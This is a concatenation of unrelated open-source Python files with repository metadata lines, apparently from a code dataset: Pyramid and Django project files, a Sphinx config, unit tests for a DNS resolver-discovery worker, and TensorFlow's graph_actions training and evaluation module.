from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = [
'PyCK',
'pyramid',
'SQLAlchemy',
'transaction',
'pyramid_tm',
'pyramid_debugtoolbar',
'pyramid_handlers',
'zope.sqlalchemy',
'waitress',
'wtforms',
'wtdojo'
]
if sys.version_info[:3] < (2, 5, 0):
requires.append('pysqlite')
setup(
name='droneos_ui',
version='0.0',
description='droneos_ui',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: PyCK",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web PyCK framework pylons pyramid',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='droneos_ui',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = droneos_ui:main
[console_scripts]
droneos_ui_populate = droneos_ui.scripts.populate:main
droneos_ui_newapp = droneos_ui.scripts.newapp:main
""",
)
| kashifpk/droneos | droneos_ui/setup.py | Python | gpl-2.0 | 1,304 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('link', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='link',
name='mailto',
field=models.EmailField(help_text='An email adress has priority over a text link.', max_length=254, null=True, verbose_name='mailto', blank=True),
),
]
| pbs/django-cms | cms/plugins/link/migrations/0002_auto_20150928_1109.py | Python | bsd-3-clause | 494 |
# -*- coding: utf-8 -*-
#
# bumper-lib documentation build configuration file, created by
# sphinx-quickstart on Thu Feb 5 01:01:24 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bumper-lib'
copyright = u'2015, Max Zheng'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.1'
# The full version, including alpha/beta/rc tags.
release = '0.0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bumper-libdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bumper-lib.tex', u'bumper-lib Documentation',
u'Max Zheng', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bumper-lib', u'bumper-lib Documentation',
[u'Max Zheng'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bumper-lib', u'bumper-lib Documentation',
u'Max Zheng', 'bumper-lib', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
autoclass_content = "both"
| maxzheng/bumper-lib | docs/conf.py | Python | mit | 8,243 |
from datetime import datetime
import dateutil.parser
import pytz
class Utils:
@staticmethod
def str_to_cassandra_time(dt_str):
print dt_str
dt = dateutil.parser.parse(dt_str)
dt = Utils.ensure_offset_aware(dt)
#epoch = datetime.utcfromtimestamp(0)
epoch = datetime.fromtimestamp(0, pytz.utc)
cassandra_time = (dt - epoch).total_seconds() * 1000.0
return '%d' % cassandra_time
@staticmethod
def time_is_offset_naive(dt):
return dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None
@staticmethod
def ensure_offset_aware(dt):
if Utils.time_is_offset_naive(dt):
return pytz.utc.localize(dt)
else:
return dt | jacekdalkowski/bike-timer | web-api/biketimerwebapi/db/repositories/cassandra/utils.py | Python | apache-2.0 | 733 |
import nose.tools as nt
import numpy as np
import theano
import theano.tensor as T
import treeano
import treeano.nodes as tn
from treeano.sandbox.nodes import anrat
fX = theano.config.floatX
def test_anrat_node():
network = tn.AdamNode(
"adam",
{"subtree": tn.InputNode("x", shape=(None, 1)),
"cost": anrat.ANRATNode("cost", {
"target": tn.InputNode("y", shape=(None, 1)),
"pred": tn.ReferenceNode("pred_ref", reference="x"),
})}).network()
fn = network.function(["x", "y"], ["cost"], include_updates=True)
for x_raw, y_raw in [(3.4, 2),
(4.2, 4.2)]:
x = np.array([[x_raw]], dtype=fX)
y = np.array([[y_raw]], dtype=fX)
prev_cost = fn(x, y)[0]
for _ in range(3):
cost = fn(x, y)[0]
assert cost < prev_cost
prev_cost = cost
| diogo149/treeano | treeano/sandbox/nodes/tests/anrat_test.py | Python | apache-2.0 | 894 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('wrecks', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='wreck',
old_name='source_id',
new_name='source_identifier',
),
]
| greencoder/shipwrecksproject | wrecks/migrations/0002_auto_20150713_1805.py | Python | mit | 388 |
# -*- coding: utf-8 -*-
'''
testing module for the worker and dns discovery library
'''
from dns import resolver
from mock import patch, Mock
from odin.worker import Worker
IP = '192.168.0.1'
@patch('dns.resolver.Resolver')
class TestWoker:
""" test worker obj"""
def test_resolve_no_timeout(self, m_dns):
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.resolve() == (True, True)
def test_resolve_with_timeout(self, m_dns):
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.resolve(timeout=2) == (True, True)
assert worker._resolver.timeout == 2
def test_resolve_NoAnswer(self, m_dns):
m_dns().query.side_effect = resolver.NoAnswer('foo')
worker = Worker(IP)
assert worker.resolve() == (True, False)
def test_resolve_NoNameservers(self, m_dns):
m_dns().query.side_effect = resolver.NoNameservers('foo')
worker = Worker(IP)
assert worker.resolve() == (True, False)
def test_resolve_Timeout(self, m_dns):
m_dns().query.side_effect = resolver.Timeout('foo')
worker = Worker(IP)
assert worker.resolve() == (False, False)
def test_dns_version_no_timeout(self, m_dns):
answers = []
record = Mock
record.strings = ['some', 'other stuff']
answers.append(record)
m_dns().query.return_value = answers
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.dns_version() == answers[0].strings[0]
def test_dns_version_with_timeout(self, m_dns):
answers = []
record = Mock
record.strings = ['some', 'other stuff']
answers.append(record)
m_dns().query.return_value = answers
worker = Worker(IP)
assert worker._resolver.timeout == 1
assert worker.dns_version(timeout=2) == answers[0].strings[0]
assert worker._resolver.timeout == 2
def test_dns_version_NoNameservers(self, m_dns):
m_dns().query.side_effect = resolver.NoNameservers('foo')
worker = Worker(IP)
assert worker.dns_version() is None
def test_dns_version_Timeout(self, m_dns):
m_dns().query.side_effect = resolver.Timeout('foo')
worker = Worker(IP)
assert worker.dns_version() is None
def test_dns_scan(self, m_dns):
answers = []
record = Mock
record.strings = ['some version', 'other stuff']
answers.append(record)
m_dns().query.side_effect = [True, answers]
worker = Worker(IP)
assert worker.dns_scan() is True
assert worker.is_dns is True
assert worker.is_resolver is True
assert worker.version == 'some version'
def test_dns_scan_without_version(self, m_dns):
m_dns().query.return_value = 'whatever'
worker = Worker(IP)
assert worker.dns_scan(version=False) is True
assert worker.is_dns is True
assert worker.is_resolver is True
assert worker.version is None
| j0lly/Odin | tests/test_worker.py | Python | mit | 3,072 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""High level operations on graphs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import sys
import threading
import time
import numpy as np
from six import reraise
from tensorflow.contrib.framework.python.ops import ops as contrib_ops
from tensorflow.contrib.framework.python.ops import variables as contrib_variables
from tensorflow.contrib.learn.python.learn import monitors as monitors_lib
from tensorflow.contrib.learn.python.learn.utils import checkpoints
from tensorflow.core.framework import summary_pb2
from tensorflow.python.client import session as tf_session
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner
from tensorflow.python.training import saver as tf_saver
from tensorflow.python.training import session_manager as session_manager_lib
from tensorflow.python.training import summary_io
from tensorflow.python.training import supervisor as tf_supervisor
# Singleton for SummaryWriter per logdir folder.
_SUMMARY_WRITERS = {}
# Lock protecting _SUMMARY_WRITERS
_summary_writer_lock = threading.Lock()
def clear_summary_writers():
"""Clear cached summary writers. Currently only used for unit tests."""
_summary_writer_lock.acquire()
_SUMMARY_WRITERS.clear()
_summary_writer_lock.release()
def get_summary_writer(logdir):
"""Returns single SummaryWriter per logdir in current run.
Args:
logdir: str, folder to write summaries.
Returns:
Existing `SummaryWriter` object or new one if never wrote to given
directory.
"""
_summary_writer_lock.acquire()
if logdir not in _SUMMARY_WRITERS:
_SUMMARY_WRITERS[logdir] = summary_io.SummaryWriter(
logdir, graph=ops.get_default_graph())
_summary_writer_lock.release()
return _SUMMARY_WRITERS[logdir]
class NanLossDuringTrainingError(RuntimeError):
def __str__(self):
return 'NaN loss during training.'
def _make_saver(graph):
vars_to_save = graph.get_collection(ops.GraphKeys.VARIABLES)
if vars_to_save:
return tf_saver.Saver(vars_to_save, sharded=True)
else:
return None
def _restore_from_checkpoint(session, graph, checkpoint_path, saver=None):
logging.info('Loading model from checkpoint: %s.', checkpoint_path)
assert gfile.Glob(checkpoint_path)
saver = saver or _make_saver(graph)
if saver:
saver.restore(session, checkpoint_path)
else:
logging.info('No variables found in graph, not creating Saver() object.')
def _run_with_monitors(session, step, tensors, feed_dict, monitors):
"""Runs session for given tensors with monitor callbacks."""
for monitor in monitors:
tensors += monitor.step_begin(step)
tensors = list(set(tensors))
outputs = session.run(tensors, feed_dict=feed_dict)
outputs = dict(zip(
[t.name if isinstance(t, ops.Tensor) else t for t in tensors],
outputs))
should_stop = False
for monitor in monitors:
induce_stop = monitor.step_end(step, outputs)
should_stop = should_stop or induce_stop
return outputs, should_stop
# TODO(ptucker): Add unit test.
# TODO(wicke): switch to forced named kwargs
def train(graph,
output_dir,
train_op,
loss_op,
global_step_tensor=None,
init_op=None,
init_feed_dict=None,
init_fn=None,
log_every_steps=10,
supervisor_is_chief=True,
supervisor_master='',
supervisor_save_model_secs=600,
supervisor_save_summaries_steps=100,
feed_fn=None,
steps=None,
fail_on_nan_loss=True,
monitors=None):
"""Train a model.
Given `graph`, a directory to write outputs to (`output_dir`), and some ops,
run a training loop. The given `train_op` performs one step of training on the
model. The `loss_op` represents the objective function of the training. It is
expected to increment the `global_step_tensor`, a scalar integer tensor
counting training steps. This function uses `Supervisor` to initialize the
graph (from a checkpoint if one is available in `output_dir`), write summaries
defined in the graph, and write regular checkpoints as defined by
`supervisor_save_model_secs`.
Training continues until `global_step_tensor` evaluates to `max_steps`, or, if
`fail_on_nan_loss`, until `loss_op` evaluates to `NaN`. In that case the
program is terminated with exit code 1.
Args:
graph: A graph to train. It is expected that this graph is not in use
elsewhere.
output_dir: A directory to write outputs to.
train_op: An op that performs one training step when run.
loss_op: A scalar loss tensor.
global_step_tensor: A tensor representing the global step. If none is given,
one is extracted from the graph using the same logic as in `Supervisor`.
init_op: An op that initializes the graph. If `None`, use `Supervisor`'s
default.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
init_fn: Optional callable passed to Supervisor to initialize the model.
log_every_steps: Output logs regularly. The logs contain timing data and the
current loss.
supervisor_is_chief: Whether the current process is the chief supervisor in
charge of restoring the model and running standard services.
supervisor_master: The master string to use when preparing the session.
supervisor_save_model_secs: Save a checkpoint every
`supervisor_save_model_secs` seconds when training.
supervisor_save_summaries_steps: Save summaries every
`supervisor_save_summaries_steps` seconds when training.
feed_fn: A function that is called every iteration to produce a `feed_dict`
passed to `session.run` calls. Optional.
steps: Trains for this many steps (e.g. current global step + `steps`).
fail_on_nan_loss: If true, raise `NanLossDuringTrainingError` if `loss_op`
evaluates to `NaN`. If false, continue training as if nothing happened.
monitors: List of `BaseMonitor` subclass instances. Used for callbacks
inside the training loop.
Returns:
The final loss value.
Raises:
ValueError: If `global_step_tensor` is not provided. See
`tf.contrib.framework.get_global_step` for how we look it up if not
provided explicitly.
NanLossDuringTrainingError: If `fail_on_nan_loss` is `True`, and loss ever
evaluates to `NaN`.
"""
if not output_dir:
raise ValueError('Output directory should be non-empty.')
with graph.as_default():
global_step_tensor = contrib_variables.assert_or_get_global_step(
graph, global_step_tensor)
if global_step_tensor is None:
raise ValueError('No "global_step" was provided or found in the graph.')
# Get current step.
try:
start_step = checkpoints.load_variable(
output_dir, global_step_tensor.name)
except (errors.NotFoundError, ValueError):
start_step = 0
summary_writer = (get_summary_writer(output_dir)
if supervisor_is_chief else None)
# TODO(ipolosukhin): Replace all functionality of Supervisor with Monitors.
if not supervisor_is_chief:
# monitors should run only on the chief.
monitors = []
elif not monitors:
monitors = monitors_lib.get_default_monitors(
loss_op=loss_op,
summary_op=logging_ops.get_summary_op(),
save_summary_steps=supervisor_save_summaries_steps,
summary_writer=summary_writer)
max_steps = (start_step + steps) if steps else None
# Start monitors, can create graph parts.
for monitor in monitors:
monitor.begin(max_steps=max_steps)
supervisor = tf_supervisor.Supervisor(
graph,
init_op=init_op or tf_supervisor.Supervisor.USE_DEFAULT,
init_feed_dict=init_feed_dict,
is_chief=supervisor_is_chief,
logdir=output_dir,
saver=_make_saver(graph),
global_step=global_step_tensor,
summary_op=None,
summary_writer=summary_writer,
save_model_secs=supervisor_save_model_secs,
init_fn=init_fn)
session = supervisor.PrepareSession(master=supervisor_master,
start_standard_services=True)
supervisor.StartQueueRunners(session)
with session:
get_current_step = lambda: session.run(global_step_tensor)
start_step = get_current_step()
last_step = start_step
last_log_step = start_step
loss_value = None
logging.info('Training steps [%d,%s)', last_step, 'inf'
if max_steps is None else str(max_steps))
excinfo = None
try:
while not supervisor.ShouldStop() and (
(max_steps is None) or (last_step < max_steps)):
start_time = time.time()
feed_dict = feed_fn() if feed_fn is not None else None
outputs, should_stop = _run_with_monitors(
session, last_step + 1, [train_op, loss_op], feed_dict, monitors)
loss_value = outputs[loss_op.name]
if np.isnan(loss_value):
failure_message = 'Model diverged with loss = NaN.'
if fail_on_nan_loss:
logging.error(failure_message)
raise NanLossDuringTrainingError()
else:
logging.warning(failure_message)
if should_stop:
break
this_step = get_current_step()
if this_step <= last_step:
logging.error(
'Global step was not incremented by train op at step %s'
': new step %d', last_step, this_step)
last_step = this_step
is_last_step = (max_steps is not None) and (last_step >= max_steps)
if is_last_step or (last_step - last_log_step >= log_every_steps):
logging.info(
'training step %d, loss = %.5f (%.3f sec/batch).',
last_step, loss_value, float(time.time() - start_time))
last_log_step = last_step
except errors.OutOfRangeError as e:
logging.warn('Got exception during tf.learn training loop possibly '
'due to exhausted input queue %s.', e)
except BaseException as e: # pylint: disable=broad-except
# Hold on to any other exceptions while we try recording a final
# checkpoint and summary.
excinfo = sys.exc_info()
finally:
try:
# Call supervisor.Stop() from within a try block because it re-raises
# exceptions thrown by the supervised threads.
supervisor.Stop(close_summary_writer=False)
# Save one last checkpoint and summaries
# TODO(wicke): This should be handled by Supervisor
# In case we encountered an exception in the try block before we updated
# last_step, update it here (again).
last_step = get_current_step()
if supervisor_is_chief:
ckpt_path = supervisor.save_path
logging.info('Saving checkpoint for step %d to checkpoint: %s.',
last_step, ckpt_path)
supervisor.saver.save(session, ckpt_path, global_step=last_step)
# Finish monitors.
for monitor in monitors:
monitor.end()
# catch OutOfRangeError which is thrown when queue is out of data (and for
# other reasons as well).
except errors.OutOfRangeError as e:
logging.warn('OutOfRangeError in tf.learn final checkpoint possibly '
'due to exhausted input queue. Note: summary_op is not '
'expected to trigger dequeues. %s.', e)
except BaseException as e: # pylint: disable=broad-except
# If we don't already have an exception to re-raise, raise this one.
if not excinfo:
raise
# Otherwise, log this one and raise the other in the finally block.
logging.error('Got exception during tf.learn final checkpoint %s.', e)
finally:
if excinfo:
reraise(*excinfo)
return loss_value
def _get_first_op_from_collection(collection_name):
elements = ops.get_collection(collection_name)
if elements is not None:
if elements:
return elements[0]
return None
def _get_saver():
"""Lazy init and return saver."""
saver = _get_first_op_from_collection(ops.GraphKeys.SAVERS)
if saver is not None:
if saver:
saver = saver[0]
else:
saver = None
if saver is None and variables.all_variables():
saver = tf_saver.Saver()
ops.add_to_collection(ops.GraphKeys.SAVERS, saver)
return saver
def _get_ready_op():
ready_op = _get_first_op_from_collection(ops.GraphKeys.READY_OP)
if ready_op is None:
ready_op = variables.report_uninitialized_variables()
ops.add_to_collection(ops.GraphKeys.READY_OP, ready_op)
return ready_op
def _get_local_init_op():
local_init_op = _get_first_op_from_collection(
ops.GraphKeys.LOCAL_INIT_OP)
if local_init_op is None:
op_list = [variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables()]
if op_list:
local_init_op = control_flow_ops.group(*op_list)
ops.add_to_collection(ops.GraphKeys.LOCAL_INIT_OP, local_init_op)
return local_init_op
def _eval_results_to_str(eval_results):
return ', '.join('%s = %s' % (k, v) for k, v in eval_results.items())
def _write_summary_results(output_dir, eval_results, current_global_step):
"""Writes eval results into summary file in given dir."""
logging.info('Saving evaluation summary for %d step: %s', current_global_step,
_eval_results_to_str(eval_results))
summary_writer = get_summary_writer(output_dir)
summary = summary_pb2.Summary()
for key in eval_results:
if eval_results[key] is None:
continue
value = summary.value.add()
value.tag = key
if (isinstance(eval_results[key], np.float32) or
isinstance(eval_results[key], float)):
value.simple_value = float(eval_results[key])
summary_writer.add_summary(summary, current_global_step)
summary_writer.flush()
def evaluate(graph,
output_dir,
checkpoint_path,
eval_dict,
update_op=None,
global_step_tensor=None,
supervisor_master='',
log_every_steps=10,
feed_fn=None,
max_steps=None):
"""Evaluate a model loaded from a checkpoint.
Given `graph`, a directory to write summaries to (`output_dir`), a checkpoint
to restore variables from, and a `dict` of `Tensor`s to evaluate, run an eval
loop for `max_steps` steps, or until an exception (generally, an
end-of-input signal from a reader operation) is raised from running
`eval_dict`.
In each step of evaluation, all tensors in the `eval_dict` are evaluated, and
every `log_every_steps` steps, they are logged. At the very end of evaluation,
a summary is evaluated (finding the summary ops using `Supervisor`'s logic)
and written to `output_dir`.
Args:
graph: A `Graph` to train. It is expected that this graph is not in use
elsewhere.
output_dir: A string containing the directory to write a summary to.
checkpoint_path: A string containing the path to a checkpoint to restore.
Can be `None` if the graph doesn't require loading any variables.
eval_dict: A `dict` mapping string names to tensors to evaluate. It is
evaluated in every logging step. The result of the final evaluation is
returned. If `update_op` is None, then it's evaluated in every step. If
`max_steps` is `None`, this should depend on a reader that will raise an
end-of-inupt exception when the inputs are exhausted.
update_op: A `Tensor` which is run in every step.
global_step_tensor: A `Variable` containing the global step. If `None`,
one is extracted from the graph using the same logic as in `Supervisor`.
Used to place eval summaries on training curves.
supervisor_master: The master string to use when preparing the session.
log_every_steps: Integer. Output logs every `log_every_steps` evaluation
steps. The logs contain the `eval_dict` and timing information.
feed_fn: A function that is called every iteration to produce a `feed_dict`
passed to `session.run` calls. Optional.
max_steps: Integer. Evaluate `eval_dict` this many times.
Returns:
A tuple `(eval_results, global_step)`:
eval_results: A `dict` mapping `string` to numeric values (`int`, `float`)
that are the result of running eval_dict in the last step. `None` if no
eval steps were run.
global_step: The global step this evaluation corresponds to.
"""
with graph.as_default():
global_step_tensor = contrib_variables.assert_or_get_global_step(
graph, global_step_tensor)
# Create or get summary op, global_step and saver.
saver = _get_saver()
local_init_op = _get_local_init_op()
ready_op = _get_ready_op()
session_manager = session_manager_lib.SessionManager(
local_init_op=local_init_op,
ready_op=ready_op)
session, initialized = session_manager.recover_session(
master=supervisor_master,
saver=saver,
checkpoint_dir=checkpoint_path)
# Start queue runners.
coord = coordinator.Coordinator()
threads = queue_runner.start_queue_runners(session, coord)
with session:
if not initialized:
logging.warning('Failed to initialize from %s.', checkpoint_path)
# TODO(ipolosukhin): This should be failing, but old code relies on that.
session.run(variables.initialize_all_variables())
if checkpoint_path:
_restore_from_checkpoint(session, graph, checkpoint_path, saver)
current_global_step = session.run(global_step_tensor)
eval_results = None
# TODO(amodei): Fix this to run through the eval set exactly once.
step = 0
eval_step = None
feed_dict = None
logging.info('Eval steps [%d,%s) for training step %d.', step,
'inf' if max_steps is None
else str(max_steps), current_global_step)
try:
try:
while (max_steps is None) or (step < max_steps):
step += 1
start_time = time.time()
feed_dict = feed_fn() if feed_fn is not None else None
if update_op is not None:
session.run(update_op, feed_dict=feed_dict)
else:
eval_results = session.run(eval_dict, feed_dict=feed_dict)
eval_step = step
# TODO(wicke): We should assert that the global step hasn't changed.
if step % log_every_steps == 0:
if eval_step is None or step != eval_step:
eval_results = session.run(eval_dict, feed_dict=feed_dict)
eval_step = step
duration = time.time() - start_time
logging.info('Results after %d steps (%.3f sec/batch): %s.',
step, float(duration),
_eval_results_to_str(eval_results))
finally:
if eval_results is None or step != eval_step:
eval_results = session.run(eval_dict, feed_dict=feed_dict)
eval_step = step
# Stop queue runners.
coord.request_stop()
coord.join(threads, stop_grace_period_secs=120)
# catch OutOfRangeError which is thrown when queue is out of data (and for
# other reasons as well).
except errors.OutOfRangeError as e:
if max_steps is None:
logging.info('Input queue is exhausted.')
else:
logging.warn('Input queue is exhausted: %s.', e)
# catch StopIteration which is thrown is DataReader is out of data.
except StopIteration as e:
if max_steps is None:
logging.info('Input iterator is exhausted.')
else:
logging.warn('Input iterator is exhausted: %s.', e)
# Save summaries for this evaluation.
_write_summary_results(output_dir, eval_results, current_global_step)
return eval_results, current_global_step
def run_n(output_dict, feed_dict=None, restore_checkpoint_path=None, n=1):
"""Run `output_dict` tensors `n` times, with the same `feed_dict` each run.
Args:
output_dict: A `dict` mapping string names to tensors to run. Must all be
from the same graph.
feed_dict: `dict` of input values to feed each run.
restore_checkpoint_path: A string containing the path to a checkpoint to
restore.
n: Number of times to repeat.
Returns:
A list of `n` `dict` objects, each containing values read from `output_dict`
tensors.
"""
return run_feeds(
output_dict=output_dict,
feed_dicts=itertools.repeat(feed_dict, n),
restore_checkpoint_path=restore_checkpoint_path)
# TODO(ptucker): Add save_checkpoint_path.
def run_feeds(output_dict, feed_dicts, restore_checkpoint_path=None):
"""Run `output_dict` tensors with each input in `feed_dicts`.
If `restore_checkpoint_path` is supplied, restore from checkpoint. Otherwise,
init all variables.
Args:
output_dict: A `dict` mapping string names to `Tensor` objects to run.
Tensors must all be from the same graph.
feed_dicts: Iterable of `dict` objects of input values to feed.
restore_checkpoint_path: A string containing the path to a checkpoint to
restore.
Returns:
A list of dicts of values read from `output_dict` tensors, one item in the
list for each item in `feed_dicts`. Keys are the same as `output_dict`,
values are the results read from the corresponding `Tensor` in
`output_dict`.
Raises:
ValueError: if `output_dict` or `feed_dicts` is None or empty.
"""
if not output_dict:
raise ValueError('output_dict is invalid: %s.' % output_dict)
if not feed_dicts:
raise ValueError('feed_dicts is invalid: %s.' % feed_dicts)
graph = contrib_ops.get_graph_from_inputs(output_dict.values())
with graph.as_default() as g:
with tf_session.Session('') as session:
if restore_checkpoint_path:
_restore_from_checkpoint(session, g, restore_checkpoint_path)
else:
session.run(variables.initialize_all_variables())
session.run(variables.initialize_local_variables())
session.run(data_flow_ops.initialize_all_tables())
coord = coordinator.Coordinator()
threads = None
try:
threads = queue_runner.start_queue_runners(session, coord=coord)
return [session.run(output_dict, f) for f in feed_dicts]
finally:
coord.request_stop()
if threads:
coord.join(threads, stop_grace_period_secs=120)
def infer(restore_checkpoint_path, output_dict, feed_dict=None):
"""Restore graph from `restore_checkpoint_path` and run `output_dict` tensors.
If `restore_checkpoint_path` is supplied, restore from checkpoint. Otherwise,
init all variables.
Args:
restore_checkpoint_path: A string containing the path to a checkpoint to
restore.
output_dict: A `dict` mapping string names to `Tensor` objects to run.
Tensors must all be from the same graph.
feed_dict: `dict` object mapping `Tensor` objects to input values to feed.
Returns:
Dict of values read from `output_dict` tensors. Keys are the same as
`output_dict`, values are the results read from the corresponding `Tensor`
in `output_dict`.
Raises:
ValueError: if `output_dict` or `feed_dicts` is None or empty.
"""
return run_feeds(output_dict=output_dict,
feed_dicts=[feed_dict] if feed_dict is not None else [None],
restore_checkpoint_path=restore_checkpoint_path)[0]
| dhalleine/tensorflow | tensorflow/contrib/learn/python/learn/graph_actions.py | Python | apache-2.0 | 24,626 |
#!/usr/bin/python
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at: http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distrib-
# uted under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# specific language governing permissions and limitations under the License.
